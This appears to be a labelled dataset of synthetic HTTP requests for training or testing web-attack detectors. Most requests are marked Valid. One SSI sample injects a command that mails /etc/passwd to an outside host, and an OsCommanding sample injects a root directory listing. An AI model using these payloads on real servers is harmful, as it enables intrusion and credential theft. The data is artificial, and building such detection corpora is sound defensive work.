GET /aYmqn/4t3Z2p-nGZUFL/mr9mmGi/rncb8eeYSR4Et/etj3oc9R/9LK/irNmcS.Rah1aOBy.pl? HTTP/1.1
Host: www.43Lftd.ch
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.0
Accept-Language: T7Ee-oIdLid, nd-jefpn, tm8t-Irc
Cache-Control: no-cache
Client-ip: 101.67.133.106
Cookie: zwindow.open8n=l4YN_jw;m2@7httpg1Bnull=l_O;lirjtvrvm0segT=o;iii2elo=t2t;aagiqph8dTdcc=j.lX2aznmJuc
Cookie2: $Version="42"
Date: Thu, 08 Jan 04 12:30:23 UTC
ETag: W/"-T4eoO3.CDM2BJMSY"
Expect: Naud=docmmtt;rdrdTo
From: dhoiTi@6ndiEy.ch
If-Modified-Since: Thu, 10 May 07 20:41:00 UTC
If-Unmodified-Since: Wed, 12 Dec 07 14:10:52 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 74
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: NTLM ZTlyb3RJN3hybWVhdHBkYVVhbzVhbjB0YTZydmV0cWhzaXJsZmVFdWl3aWl6eWlm
Authorization: Basic dGxwcGFlcjplc2kyeHJ2
Range: -0
Referer: /aeke/anAIy.fgf
TE: trailers,gzip;q=0.7,chunked
Trailer: User-Agent
User-Agent: Mozilla/0.3 (compatible; ahsplEilte; SunOS sun4u; poayfT; Ivola0s; iAniit5lu)
UA-CPU: x86
UA-Disp: 7139,4412,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 8027x0405
Via: 1.8 185.239.133.174, 4.2 145.14.210.115:7642, FTP/9.0 33.98.251.163
Transfer-Encoding: identity
Upgrade: bohqh/1.4
Warning: 599 248.78.6.97 "deo0tiacbum" 
X-Forwarded-For: 157.146.253.229
X-Serial-Number: 6772472077190177266
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18650
Start - Id: 21183
class: Valid
GET /eam9cogecxvf.swf?d6ZE=idc&hitIassvn=5844&lbqCUrr9JT=heeot HTTP/1.0
Host: www.tfn0h.be
Connection: close
Accept: audio/basic, text/plain;q=0.1
Accept-Charset: x-mac-chinesetrad
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 201.72.152.249
Cookie: ieudttItt=oehbin;sloznnhusrn=j;GQR2yD=oOotyina9r ihcat;Kehcur4wsvw=eo(\ nrzro
Cookie2: $Version="9"
Date: Sat, 23 Jan 10 22:47:40 UTC
ETag: W/"AjdzidpcYzaxscig7kZv"
Expect: 100-continue
From: aetfaus@nbciblTus.fr
If-Modified-Since: Fri, 07 Aug 09 21:11:35 CET
If-Unmodified-Since: Tue, 02 Oct 07 21:47:24 UTC
If-Match: "jVoK1wLYkgYMkWNasDTJ"
If-None-Match: "2DvD5bw4Pm8zeCJG2"
If-Range: "2_aY@bUBNXfKXmF"
Max-Forwards: 65
MIME-Version: 3.3
Pragma: ecdrih4A='ao'
Proxy-Authorization: Digest realm
Authorization: Basic ZGVscmdiYTpldDBl
Range: 85-737,54-2,-6
Referer: http://IOeOstR.st/naeodoU2/mmcrn.cfm
TE: chunked;q=0.1
Trailer: Authorization
User-Agent: Mozilla/4.9 (compatible; c2rh3aC; Linux i586; riDrSD1ck; nSs1weweel)
UA-CPU: PowerPC
UA-Disp: 9976,202,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 402x543
Via: HTTP/1.8 www.sldht.tiff, 7.3 www.ebhlIsCC.html, FTP/3.8 www.izhaq.tiff:53916
Transfer-Encoding: identity
Upgrade: ecLpx/0.9, tnlH/7.6
Warning: 796 www.shynkJe.jpeg "oinh" 
X-Forwarded-For: 105.99.66.229
X-Serial-Number: 041648335
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21183
Start - Id: 24680
class: Valid
GET /3ohitraSmlfN9eyfOje/ae/aJ9D4QFImsnJ-lLk/ah9f2eloueISsmeh/vnHNkstyle/rtSEr9Hzsxe.nsf?sxto4ahahs=e6&Seo=ru2Le%400 HTTP/1.0
Host: 236.179.174.36:80
Connection: dtn0fkhr
Accept: application/rtf
Accept-Charset: *
Accept-Encoding: compress;q=0.1, identity, deflate;q=0.4, identity;q=0.9
Accept-Language: *
Cache-Control: no-transform
Client-ip: 86.24.145.117
Cookie: 7I0slIen5y=7323;homesYsa=iDb;wpHdCd=hxH
Cookie2: $Version="380"
Date: Tue, 15 Aug 06 24:37:54 GMT
ETag: W/"RA93g4f79hQLCowl8Xs"
Expect: u5o62at
From: tloo@08oaacota.gov
If-Modified-Since: Thu, 02 Dec 04 14:11:35 GMT
If-Unmodified-Since: Thu, 24 Mar 05 10:41:38 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 21 Jan 08 04:49:09 UTC
Max-Forwards: 26
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: eiht4 wSg1Bo=amlc
Authorization: Digest opaque="lczi"
Range: 1773-,147343-45947,-7279
Referer: http://elir.ch/ssco9n/vithatiu/eilsk/wzytou/niqeoYt.dll
TE: deflate;q=0.1,trailers
Trailer: If-Match
User-Agent: Mozilla/7.2 (Windows; U; WinNT 6.4; hh-yi; rv:2.6.9) Gecko/64097096
UA-CPU: PowerPC
UA-Disp: 986,554,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 089x5784
Via: 0.0 www.tytitee.shtml, 2.7 61.204.122.193, 6.1 www.edxtte.tiff
Transfer-Encoding: ndnmm; vhltHu=sodneylY
Upgrade: eew3/9.6
Warning: 540 44.10.123.96:4 "peien0ehi" 
X-Forwarded-For: 248.154.151.220
X-Serial-Number: 05865096
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24680
Start - Id: 3133
class: Valid
GET /nQFuGF.3adVw1/-Z7yYWPLoptR8eG/ojnsoey1mtZRrpfyL/Z2eaO8patgesehrine/eNdoXZDyKkK823p/tNtqr-/o_82TWNT8/E4GwimgFaX@VlY/MjG5BV_tmp-/tyt36_1Wl/w-JuIP2.U67.dsN8OAX/1Nalt.jpg?htrnt2keEtk=4500905731&SE=sxmlaYpeh5uwal&IRjdtttXo=Aotsbe2yf&oitm=ei0zUDnyihrtcn&TT3e56n=700&nl3trstw=oht&JUratoogo=206973858&aHGrgurnWo=hF_fxZm&tqtqdrnrdej=13260885 HTTP/1.0
Host: www.ixfumeeet.uk
Connection: sesen
Accept: video/quicktime, image/png, application/rtf;q=0.0
Accept-Charset: isiri-3342;q=0.2, windows-1258
Accept-Encoding: gzip;q=0.7, deflate
Accept-Language: 4i-t;q=0.9
Cache-Control: r3ti=iio3d
Client-ip: 98.170.128.115
Cookie: 7Oninotiniartce=fPZSaK;okin=2580214510;xgrrJH=tltehslAwlit8eiaT;Yi=3x|e-e4zusrsirnEusnRts;7_ET=of~y5'adminlst
Cookie2: $Version="69"
Date: Sun, 30 Mar 08 15:20:34 CET
ETag: "H@VzeDF5Q7kyYecEMGQM"
Expect: noraeoc
From: eead@01e8oq1.gov
If-Modified-Since: Mon, 02 Oct 06 19:55:35 CET
If-Unmodified-Since: Thu, 29 May 08 02:28:36 CET
If-Match: "rdT3btif2dxfJ2ImA"
If-None-Match: *
If-Range: Tue, 12 Aug 08 12:14:15 CET
Max-Forwards: 469
MIME-Version: 7.8
Pragma: f3e='nkex80w'
Proxy-Authorization: soe8zt sjRmiek=rtuiiair
Authorization: NTLM YWxhNGVpNHNha3RzZW5zZWFidFBlZmR0NXNlbm9pZGk3STRhZQ==
Range: 901-,219-,-83
Referer: http://as8houHa.it/6waO/qdttnmr.tiff
TE: chunked;q=0.3
Trailer: Transfer-Encoding
User-Agent: T3lnsareaagkht0m3
UA-CPU: PowerPC
UA-Disp: 245,4881,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5219x775
Via: edd/6.6 www.h3s4o.jpeg, o2rand/9.2 www.vmwiMtro.gif, 5.0 www.eqrarAo.css
Transfer-Encoding: deflate
Upgrade: qtipy/8.0, crocn/6.7, lns/3.2, psbneW/8.3
Warning: 446 www.fikne.html "nqbsbldmuEl1E71nq1" 
X-Forwarded-For: 54.64.220.207
X-Serial-Number: 545829621
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3133
Start - Id: 21360
class: Valid
GET /tb-TV@JVKGg/teLvlfaabeg71kDj/hbcnsiaoQ/77UOg5echoUjLLC/toPinNSjAquMB/5Tj-HibntL0l.J/rle/yOdXswlibGacopyAtelnet4_d/4@1varfGG6scriptumochaV/tZcgwCa1zWMogVqujgL/yo-4mocha.jpg?Ostdin6M=Gsniog&eZaW0zncTvST=rhtbopt+rmt%3DacsnH&joGgvbscriptAvBandR=eqcyFVrbhK HTTP/1.1
Host: www.ohoim.be:1
Connection: close
Accept: text/*;q=0.6, image/gif;q=0.3
Accept-Charset: iso-8859-2;q=0.4, windows-1252
Accept-Encoding: 
Accept-Language: Ns9eajnt-icr;q=0.0, ett-S;q=0.3, S9Slrmge-bbjt;q=0.6, fsbuc3-ieibTaT, wSuwhso9-essateg
Cache-Control: no-transform
Client-ip: 98.99.91.46
Cookie: lhl6doa2iOnboe=aj;sLNa=m5zoamiGlzh;sr14u4h2e01=zt
Cookie2: $Version="2"
Date: Tue, 16 Nov 04 22:42:03 CET
ETag: W/"EbC1IoImO6uQn5K7TO"
Expect: 100-continue
From: 9mri@3deej0d.de
If-Modified-Since: Mon, 19 Dec 05 08:07:57 UTC
If-Unmodified-Since: Mon, 23 Nov 09 03:13:28 CET
If-Match: ".v-ZydBNSK@VoPB"
If-None-Match: *
If-Range: Sat, 02 Jan 10 11:26:17 CET
Max-Forwards: 9
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: pdes tdeoj3=tuintwh
Authorization: Basic YWdzTnlObjpldHJqNw==
Range: -510,-15,91865-958
Referer: http://e1xtshTs.de/rrdhrM/raep1NNt.asp
TE: trailers,gzip;q=0.7
Trailer: Upgrade
User-Agent: Mozilla/1.8 (Windows; U; Win 9x 3.7; 8t-t8; rv:2.2.9) Gecko/45273584
UA-CPU: x86
UA-Disp: 9753,204,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 1496x218
Via: 0.1 www.gs3eX3b.png:40, beUdos/6.3 www.jbeh.png:9350, HTTP/3.7 www.n1ht.tiff:7
Transfer-Encoding: u62vat
Upgrade: rhr/1.3, Smen/4.8, iZ2/9.9, 9env/2.8
Warning: 779 111.202.74.226 "loent" 
X-Forwarded-For: 86.182.5.47
X-Serial-Number: 2418413
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21360
Start - Id: 10941
class: Valid
GET /iom9netheEdNteeL/eAdrdgedsi/iG@wi6wsDsM-64L23Z/oi.css?ya=node%2By HTTP/1.0
Host: 57.157.153.154
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-2, windows-874, iso-10646-ucs-2;q=0.3, euc-cn;q=0.8, x-mac-arabic;q=0.3
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 114.65.2.162
Cookie: resnorsakyole=nbtt31LaRtsnu;auun=42;vckPya_-REZ2=mrkwooaaheeu<;yuu=200672678;hai5wp6aj1=sstshetuEemses;ei2ldnrg1mmraR=oty
Cookie2: $Version="384"
Date: Sat, 30 Apr 05 16:28:43 UTC
ETag: "aUP_cTg21PUfp9J"
Expect: 100-continue
From: teehrre@wibas.it
If-Modified-Since: Thu, 01 Oct 09 13:58:00 GMT
If-Unmodified-Since: Sat, 10 Feb 07 05:57:16 UTC
If-Match: "ev2lIFHT-wGMCHUG26YH"
If-None-Match: *
If-Range: "YmOS393Fx89WCsrc"
Max-Forwards: 69
MIME-Version: 6.9
Pragma: eo=ihu
Proxy-Authorization: NTLM bmlhNHIybU5memFNZXZJeHFhcGFuY2ZlYXQybkVlQ3lyc3N0NXl0b2VlRXJlaA==
Authorization: NTLM YW5oc3Z5ZW5Bbm9hbjlocmhJYTBvMHIyb0hSZmMyaXlpTDNheTVlbw==
Range: -72,78634-
Referer: /neatae/adio/fsOhdtsn/g6ts/fearrS.swf
TE: chunked;q=0.7,deflate
Trailer: Accept-Encoding
User-Agent: neeglj/6.2.3
UA-CPU: PowerPC
UA-Disp: 3789,454,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 5309x7001
Via: 6.1 209.54.173.21, 6.7 189.77.132.157
Transfer-Encoding: 3abtG; ondt6c=eberiat
Upgrade: ocou/9.0, etdase/9.0, hnh/9.3
Warning: 917 173.28.222.9 "HHlwrlufhgiWi" "Tue, 01 Feb 05 01:45:23 GMT"
X-Forwarded-For: 213.119.25.206
X-Serial-Number: 847206508501943209
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10941
Start - Id: 34185
class: Valid
POST /b78ApQjfc5ObEcoPkXSr/VOPmboYk9.jsp? HTTP/1.0
Content-Length: 181
Content-Language: cie,nf
Content-Encoding: compress
Content-Location: http://www.rkiRdub8.fr/suSa9tiN/e8nqr.tar.gz
Content-MD5: YXJpZXJVbmM2ZHFuNWV5dg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 07 Jun 05 13:11:04 CET
Last-Modified: Mon, 10 Mar 08 04:44:30 UTC
Host: www.itsfeteoA.st:457
Connection: rdlac
Accept: image/jpeg;q=0.0, text/*
Accept-Charset: iso-2022-jp;q=0.5
Accept-Encoding: compress;q=0.2, compress, deflate;q=0.7, deflate;q=0.1
Accept-Language: hytfirr-Ioa;q=0.8, dis-xaetiE;q=0.5
Cache-Control: no-store
Client-ip: 86.178.170.4
Cookie: se8Rlirpen=trlash bnesystem4A;8HciIazonsutot=yS5v;GevneRncdoeue=hielQ;ewtepeaaasSru3=<n;syse6moa8=87376970
Cookie2: $Version="08"
Date: Sat, 08 Nov 08 14:55:10 UTC
ETag: "ehlGSz.VF..ZXY@"
Expect: 100-continue
From: ohlyy@feemi6ooi.ch
If-Modified-Since: Tue, 04 May 10 14:07:26 GMT
If-Unmodified-Since: Thu, 10 Sep 09 01:57:15 GMT
If-Match: "gV4OMxY4YQ1HywCCRrL"
If-None-Match: *
If-Range: "e5n3Ki-o-_zBLEc"
Max-Forwards: 9422
MIME-Version: 8.8
Pragma: efea9io=Odoeusi
Proxy-Authorization: Digest username="pcny3"
Authorization: tee8Or yndng=slseSssf
Range: -23,3-
Referer: /uejSnro/2oeIA0.avi
TE: trailers,trailers,gzip
Trailer: Authorization
User-Agent: Mozilla/9.3 (compatible; nodeelgme; Open BSD i386; 9ptxd7e1; kbeD)
UA-CPU: 68000
UA-Disp: 892,7658,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 2584x7510
Via: HTTP/9.2 www.undrgs.gif
Transfer-Encoding: oeie
Upgrade: ciwqt/3.9, Ltten/0.9
Warning: 577 www.iatho3sd.html:85826 "eyhmejnm9eoqif6ur52E" 
X-Forwarded-For: 39.178.242.76
X-Serial-Number: 8391965
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

6adeuus=72162641&LFXN0t=o3tegty&rbO0qarhoEblhaE=joeegl&lUoiahodtshu=pQs9v&snenEoauim=305&TUt9khgr4BGj=3491&2aooeytT=imr7lfrso&Etyghn3NTlWene=isQn2fgaexecr&hel1oait=HBdb5nee$zmstps

End - Id: 34185
Start - Id: 34338
class: Valid
PUT /9le51i/aehaefo/ni/etUhJ4Awtzuc1/3e/nwamrsnOtnammrieprL/baccess_logyc.mdb? HTTP/1.0
Content-Length: 57
Content-Language: iitupa,D
Content-Encoding: identity
Content-Location: http://www.ei5aer.org/uecOh/Mgor.php4
Content-MD5: aWJJVGF0ZWVlVW90YzJvdw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 27 Aug 05 14:44:33 CET
Last-Modified: Tue, 28 Sep 04 02:25:48 GMT
Host: 197.114.141.112
Connection: close
Accept: video/mpeg;q=0.9
Accept-Charset: windows-1253, euc-kr;q=0.4, koi8;q=0.6, utf-8;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: min-fresh=18052
Client-ip: 108.37.62.141
Cookie: faz=0;dlsrehjeads=regedusOohdm6;ac5mf=627404;j@SN8s73_LM=3;stiah=eee
Cookie2: $Version="2"
Date: Sun, 19 Dec 04 24:51:34 UTC
ETag: W/"rAfen5-WrvFEq@B"
Expect: 100-continue
From: 8Tmtnybi@toleu.gov
If-Modified-Since: Fri, 09 Jan 09 06:29:20 UTC
If-Unmodified-Since: Thu, 08 Jan 04 22:14:04 UTC
If-Match: *
If-None-Match: "bGvMjdQJA7WH8_jir"
If-Range: Tue, 09 Feb 10 08:51:01 GMT
Max-Forwards: 2875
MIME-Version: 5.0
Pragma: eieh='s'
Proxy-Authorization: NTLM aU9yd2hldW1uZ3RycnFtdUhqZUE0b3U5cmVzdGJyc3RhZTFnYWk1bnZveWVMbQ==
Authorization: NTLM ZWFPMXBpZDhzZW5hbXJhY2FtZWhhcXVlb283dGFyYW9h
Range: -17313
Referer: http://qiatrnT.fr/hmmt/rrpuhmc/LaCxro/a7nht.png
TE: gzip;q=0.4,trailers,chunked
Trailer: Authorization
User-Agent: Mozilla/3.6 (compatible; Konqueror/0.1; Windows NT; e67teMmw; rrtA; nSokea58h)
UA-CPU: Sparc
UA-Disp: 3186,9762,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 9714x0556
Via: 6.6 166.42.247.152:908, 6.9 www.ncsi6.shtml
Transfer-Encoding: gzip
Upgrade: rdr/6.4, 3nxf/4.2, 62a3t/9.7, gmOIe/2.2, sz3/4.6
Warning: 784 www.qelosv.tiff "satlme3dro" 
X-Forwarded-For: 143.200.9.7
X-Serial-Number: 57690312658
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

sny=sam&3@dIDh=65634213&eel4wzmNootakh=rsqdoa-aztg&zib= b

End - Id: 34338
Start - Id: 24960
class: Valid
GET /ottya5fpigdeugrdiHs/1ghiWosphbdsbrer/mN.htd.php3?W@sZcoV5Ftblike=Gw&ngbeoEtrhgEhi=+na+iGtresc%3Anwx%3Cl&oT=67678&tHohzh6eboifrrt=o+fX&gQDJjbetweenm=iEpeu1formncetr&nostve=te4ynao&id=aWXuOhylY3&YBN5i1i7=cUPbVFC&deuxEnymr=839257726&lnaosotmdaij=bt4nee%3Eereotnta&_KSWFoz_=rE_uhWX-Bz&nmetewqblmsqNnt=nodeblrxnoscript&iKrrqhsrysmi=i&Hdcrftvnewi=5375 HTTP/1.0
Host: www.nisd.st:79
Connection: tsrO4mta
Accept: image/jpeg;q=0.1, text/html;q=0.7
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 115.80.65.226
Cookie: ocmnnnnnph=215690;shEthh=462;gazooatn=bui2shdropb;mdnsriebIuBr6i=d tUadminapRvaaeu(ekecopys%
Cookie2: $Version="2"
Date: Sun, 04 Sep 05 08:15:01 UTC
ETag: W/"SImW8X_MZ.SowaC"
Expect: 100-continue
From: iefmllR@anati.de
If-Modified-Since: Thu, 23 Feb 06 07:15:48 CET
If-Unmodified-Since: Sat, 20 Jan 07 19:25:36 GMT
If-Match: "8f1D0s-Kn8CWZoUT5"
If-None-Match: "6q7fPJucTdIQXOl@fAr"
If-Range: Thu, 22 Jul 04 20:58:34 CET
Max-Forwards: 08
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: NTLM bmRzUmZ0b3RudnltbmJ5bXRqdTN0c3N1dTRON3lFaWVzb2k=
Authorization: NTLM Y2JhbGU1a2ltdW4waXdZb3JvcmFhaWxhNmJzZWFvaXRUczFveWlyQW5lZWhpZWVq
Range: -652846
Referer: /Osaheaes.zip
TE: trailers,trailers,trailers
Trailer: TE
User-Agent: Sxr9t/5.6.5
UA-CPU: PowerPC
UA-Disp: 028,484,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 778x801
Via: HTTP/8.6 www.hu2ari.tiff
Transfer-Encoding: gzip
Upgrade: 3bda/0.6, httrt3/8.5, bqt/6.9
Warning: 586 www.xoesS.jpg "tereeuOoER" "Sun, 31 Oct 04 12:03:58 GMT"
X-Forwarded-For: 86.74.11.156
X-Serial-Number: 2466804840974150
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24960
Start - Id: 21964
class: Valid
GET /iz1Y.htm?uiohQiecp=7&pohT=16104717&0anosh=afCfB3o&1HtHel=17808&ez9belhE6BCteor=a&u5c=sls&oz2e=87628&7xpyCnmQL.=59265&iyWwc0imoeia=9QZl_B&nr6In=vmW3zIvms HTTP/1.1
Host: www.lmrlrcumiy.uk
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: lhrsrr-uB;q=0.8
Cache-Control: max-age=3946
Client-ip: 3.169.52.148
Cookie: isa=6876;samlzQ=6;kOg=6ltC62kisXedp]5;eseoofstom=l+
Cookie2: $Version="87"
Date: Sat, 05 May 07 16:49:14 GMT
ETag: W/"bquNntauCwXOwIv9c"
Expect: tfdnhe=rmsnr;UkNdcMt
From: oIci6Moi@sbleMCwj.be
If-Modified-Since: Wed, 27 Apr 05 12:17:44 UTC
If-Unmodified-Since: Wed, 17 May 06 07:47:16 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 98
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Basic Y3VkUzpocm5n
Authorization: cy2u 3lxxbd=etqtaea
Range: 99-8956,05459-
Referer: http://zaconh.uk/cEfMVfct.tar.gz
TE: trailers
Trailer: Expect
User-Agent: iIodImpil (yruiJ0PQmU; ei2Pxw1i1K)
UA-CPU: MIPS
UA-Disp: 514,290,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 044x0436
Via: FTP/3.3 10.189.225.53
Transfer-Encoding: compress
Upgrade: fysst/0.3
Warning: 945 www.u1eyergi.jpg:82873 "ihvut8ngwso" 
X-Forwarded-For: 133.218.232.127
X-Serial-Number: 09176432061314
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21964
Start - Id: 39990
class: SSI
GET /3jKq5CUuQ/formBBJTRsoVX/njrmZb1/ahV2puiuPcH2pfvYvaHr/tBu.2WQrjFd3m.html?heosafnngu=v8Aw&rresloq9nr=drehf3swofe0Whgq&G80K=-t&fhfabtn=713&Xhi=476&zint=%3C%21--%23exec+++++cmd%3D%22%2Fbin%2Fmail+++eb.com+%3C++++%2Fetc%2Fpasswd%22--%3E&2C4kgfwgetBUJ=ad%28hn5xfen&9edi=ha&2Pf=s9ClO8C.5H%40 HTTP/1.1
Host: www.TdeAr3rt.st
Connection: snaoaa
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 134.222.60.191
Cookie: docsurmmgo6a=seWA1MpM2A;aqceitnnta=waey
Cookie2: $Version="941"
Date: Tue, 15 Feb 05 21:12:55 CET
ETag: "Y5G0r-gDV1rDCTn"
Expect: 100-continue
From: 5iWxsCt@nr6efecsn.de
If-Modified-Since: Thu, 21 Jul 05 06:20:02 CET
If-Unmodified-Since: Fri, 08 Jan 10 11:12:33 CET
If-Match: "UM5lK2RzNYZxvVlh"
If-None-Match: "9a-dDsrLxzgaIaW2"
If-Range: Fri, 12 Jun 09 12:43:30 UTC
Max-Forwards: 1
MIME-Version: 3.3
Pragma: t=d
Proxy-Authorization: NTLM NlQ2YWhtdWl0dGR2TGxlem9OZW50dG9vaXI5VTVicmlzc2xnbm9rZW9sdGVuZWU=
Authorization: Digest realm
Range: 618-573,4-,461-
Referer: http://www.o5iydnjp.biz/houf.mpg
TE: gzip;q=0.9,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/1.4 (Machintosh; U; PPC 7.3; o5-aI; rv:1.6.5) Gecko/70989681
UA-CPU: Sparc
UA-Disp: 8616,110,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 860x1351
Via: 0.7 www.7yywai.js, acRts/9.7 98.22.82.136
Transfer-Encoding: deflate
Upgrade: sdsn/9.0, uilud/8.5, 5iaeew/4.1, TeH/9.8
Warning: 144 202.212.126.14 "EZtzaaiitexz9rs" 
X-Serial-Number: 18116
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39990
Start - Id: 36835
class: OsCommanding
GET /lLq/mnZUmwRmhtpassjThX/htnrRe4Hwex3motn/j1GstKB3xk3@UzhI3Mf1.pl?ti3cw=%3Alle+n5d%2Bpdsenhsxmlij&oeosa=B&QBuhccopyR=2&cilorataejd=4589061071&mefigegriNw=57591&rheunty5h=%5Cnls+%2Froot%2F&tatianean=in0w1cdttfTc&icp6t=%29%28telnett%24etax%7E+O+hhOs%7Eda&Ig=e HTTP/1.0
Host: 197.160.54.11
Connection: close
Accept: image/*, application/*
Accept-Charset: iso-8859-4, euc-tw, euc-kr;q=0.5
Accept-Encoding: 
Accept-Language: eP5IngAe-ca
Cache-Control: max-age=7
Client-ip: 79.73.117.253
Cookie: ddQjPugX=N/a)phptagEeftrlaiext;sNtguyt5Ni=28371896;8meitekbpiXt=havingenc3;pu=eO0U7;ooeetRa=b5nHa
Date: Sun, 13 Jul 08 21:38:05 CET
Expect: 100-continue
If-Unmodified-Since: Tue, 05 May 09 11:04:42 GMT
If-None-Match: "iy2BG3BWGNHuOqn4p6hP"
If-Range: Fri, 15 Jun 07 13:34:05 UTC
Max-Forwards: 0
Pragma: wseoAiSe='sOyj'
Authorization: Digest qop=Otog8M
Referer: http://yesfir.st/ssq7/p6rth.png
User-Agent: caXXBY http://www.eeditt.net
UA-OS: Windows 95
UA-Color: color16
Via: 8.9 73.91.243.132, 7.7 130.163.152.141

null

End - Id: 36835
Start - Id: 12665
class: Valid
GET /mSgFqRAxe2Rm4Umw.Tmi/52n/rPt.vpKPtHui/rM-gAqdULZE9JmKdz/oeikt/wzee9nrkw/un06EA_nB9IUtpE_ie5R.mspx?sIohal9bgii1=ahcetf8ais4&loewS9bhtJwn=eefgo7&irnOnlD72=6&bntWe=sUfiCBrVe06&If1childE.k=53 HTTP/1.1
Host: www.sajieiH5n.com:8
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: max-age=581
Client-ip: 55.229.21.150
Cookie: 3eagnrngocrd2=t/kegPnodethdservices;otioaRii8t9f4s=o$9esfr;lbrr0ldaan=$ltosB
Cookie2: $Version="4"
Date: Sun, 07 Jun 09 04:00:02 UTC
ETag: W/"c7QYY67P8fk3zM_1"
Expect: 100-continue
From: gDermEe@fetw6.biz
If-Modified-Since: Tue, 18 Nov 08 18:02:39 UTC
If-Unmodified-Since: Mon, 15 Feb 10 11:32:19 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 19 Jan 06 22:28:14 GMT
Max-Forwards: 161
MIME-Version: 5.0
Pragma: 9tt='ro6'
Proxy-Authorization: NTLM dDZocGFoY2FlbXZsN3JzZVN0R25OMXJyZXRvZnRlT2U=
Authorization: NTLM YWZic0llYXBpaW90eHBwaWxSMzV0aWVwYnBkbGFlZXNsZ2c=
Range: 4-14020,90205-
Referer: http://hyhoad.org/Noeneoo/ltrbOqea/zhlni/p0xodt.pl
TE: trailers
Trailer: Range
User-Agent: Mozilla/6.3 (compatible; Konqueror/0.7; Linux i386; uUh0cenw; e89sodd; ehom)
UA-CPU: PowerPC
UA-Disp: 8687,0336,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 961x7915
Via: HTTP/8.7 0.25.70.129, ife/1.6 15.169.105.84:16, 4.2 7.43.129.128
Transfer-Encoding: deflate
Upgrade: oedu/2.8, erlke/9.0, 69utos/0.6, enrd6b/0.7, gblt/4.5
Warning: 146 47.193.224.187 "ahteyootiikhn" 
X-Forwarded-For: 204.159.248.29
X-Serial-Number: 66365991988346934355
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 12665
Start - Id: 29799
class: Valid
GET /R.tAvoecnLRf/Eqperl8SofQDWHMxp_Zc/LAtdmlste0rd5wo/tsee2/F3Nxf4Jhum9copyL.H/ttzinnlnao/s@metaqzfNnph-s9Np2i.swf?Oudf2Hleih=r3SxWtF&1Htm0dtk=564218&onmlpnEbhdpisd=tmi%3D%3A+&ZLMLinsertPY.=ph+N&TseiztcY3diyo=2376540&s6euh5cn9ei=8331&cinmehStqschdp=srerpnky00nog&NtiE7fcaz=sEshwpo2qhdletseu&4nnys4tflk=%5Ba&tnsesseehbhMcU=h&asrtwbcdrfe=jvecjp HTTP/1.1
Host: www.Oseueerhto.net
Connection: close
Accept: */*;q=0.4
Accept-Charset: hz-gb-2312
Accept-Encoding: 
Accept-Language: s-zE6, i-eenrcat0
Cache-Control: no-transform
Client-ip: 0.99.235.120
Cookie: dsot=ooi;AfromJ_cvpositionO=ti
Cookie2: $Version="92"
Date: Wed, 30 Aug 06 17:04:55 UTC
ETag: "hPpIiMmM7JTv93r0P"
Expect: b9eH0S
From: ouiean@taluth.it
If-Modified-Since: Sun, 26 Sep 04 15:21:08 GMT
If-Unmodified-Since: Tue, 21 Jun 05 08:40:25 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 03 Jun 07 11:33:10 CET
Max-Forwards: 46
MIME-Version: 0.0
